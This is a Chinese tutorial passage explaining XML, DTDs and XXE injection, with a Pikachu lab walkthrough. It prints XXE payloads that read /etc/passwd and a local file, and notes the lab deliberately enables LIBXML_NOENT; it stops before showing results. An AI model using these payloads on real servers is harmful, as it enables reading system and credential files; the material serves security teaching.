一、什么是XML?
XML 文件是 XML(可扩展标记语言)数据文件。它的格式与.HTML 文档非常相似,但使用自定义标记来定义对象和每个对象中的数据。XML 文件可以被认为是基于文本的数据库。
XML 类似于 HTML。XML 和 HTML 都包含 用于描述页面或文件内容的标记符号。但是,HTML 仅描述了网页的内容(主要是文本和图形图像)的显示和交互方式。例如,放置在标记标记内的字母“p”将开始一个新段落。
XML 根据所描述的数据描述内容。例如,放置在标记内的单词“phonenum”可以指示随后的数据是电话号码。XML 文件可以完全由程序处理为数据,也可以与其他计算机上的类似数据一起存储,也可以像 HTML 文件一样显示。例如,根据接收计算机中的应用程序如何处理电话号码,可以存储,显示或拨打它。
XML 被认为是可扩展的,因为与 HTML 不同,标记符号是无限的并且是自定义的。对于如何创建文档结构,XML 是标准通用标记语言(SGML)标准的一个更简单且更易于使用的子集。预计 HTML 和 XML 将在许多 Web 应用程序中一起使用。例如,XML 标记可能出现在 HTML 页面中。
XML 格式将数据存储在机器可读且人类可读的结构中。有大量程序可以打开 XML 文件。由于它们被格式化为文本文档,因此可以由基本文本编辑器查看和编辑它们。
二、XML语法结构
XML语法结构大致如下
第一部分:XML声明部分
<?xml version="1.0"?>
第二部分:文档类型定义 DTD
<!DOCTYPE note[
<!--定义此文档是note类型的文档-->
<!ENTITY entity-name SYSTEM "URI/URL">
<!--外部实体声明-->
]>
第三部分:文档元素
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>
其中,DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以是引用外部DTD,现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
① 内部申明DTD格式
<!DOCTYPE 根元素 [元素申明]>
② 外部引用DTD格式
<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">
③ 引用公共DTD格式
<!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">
外部实体引用 Payload
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
三、XXE概述
XXE,“xml external entity injection”,即"xml外部实体注入漏洞"。
攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致出现安全问题
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
四、XXE漏洞实验(pikachu)
PHP中有一个函数 simplexml_load_string() 将形式良好的 xml 字符串转换为 SimpleXMLElement 对象
在PHP里面解析xml用的是libxml,其在 ≥2.9.0 的版本中,默认是禁止解析xml外部实体内容的。
本章提供的案例中,为了模拟漏洞,Pikachu平台手动指定 LIBXML_NOENT 选项开启了xml外部实体解析。
在 Pikachu 平台上,我们先提交一个正常的 xml 数据
<?xml version = "1.0"?>
<!DOCTYPE note [
<!ENTITY hacker "test">
]>
<name>&hacker;</name>
它将我们定义的实体内容打印在了前端
那么,如果我们提交下面这样的payload,就能看到服务器上的文件内容
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///E://ceshi.txt">
]>
<x>&f;</x>
比如我们在E盘放了如下文件
实验结果: